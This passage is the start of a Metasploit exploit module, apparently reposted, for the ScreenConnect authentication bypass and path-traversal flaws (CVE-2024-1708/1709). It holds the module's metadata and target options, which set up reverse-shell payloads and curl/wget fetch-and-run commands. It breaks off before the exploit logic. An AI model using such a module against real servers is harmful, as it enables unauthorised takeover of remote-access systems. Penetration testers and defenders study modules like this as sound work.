## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7 and below are affected. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF RCE Exploit 'WatchTowr', # Auth Bypass PoC ], 'References' => [ ['CVE', '2024-1708'], # Path traversal when extracting zip file. ['CVE', '2024-1709'], # Auth bypass to create admin account. ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs ], 'DisclosureDate' => '2024-02-19', 'Platform' => %w[win linux unix], 'Arch' => [ARCH_X64, ARCH_CMD], 'Privileged' => true, # 'NT AUTHORITYSYSTEM' on Windows, root on Linux. 'Targets' => [ [ # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads: # windows/x64/meterpreter/reverse_tcp 'Windows In-Memory', { 'Platform' => 'win', 'Arch' => ARCH_X64 } ], [ # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads: # cmd/windows/http/x64/meterpreter/reverse_tcp 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL', 'FETCH_WRITABLE_DIR' => '%TEMP%' } } ], [ # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads: # cmd/linux/http/x64/meterpreter/reverse_tcp # cmd/unix/reverse_bash 'Linux Command', { 'Platform' => %w[linux unix], 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'FETCH_COMMAND' => 'WGET', 'FETCH_WRITABLE_DIR' => '/tmp' } } ] ], 'DefaultOptions' => { 'RPORT' => 8040, 'SSL' => false, 'EXITFUNC' => 'thread' }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, # The existing administrator ..
Support the originator by clicking the read the rest link below.
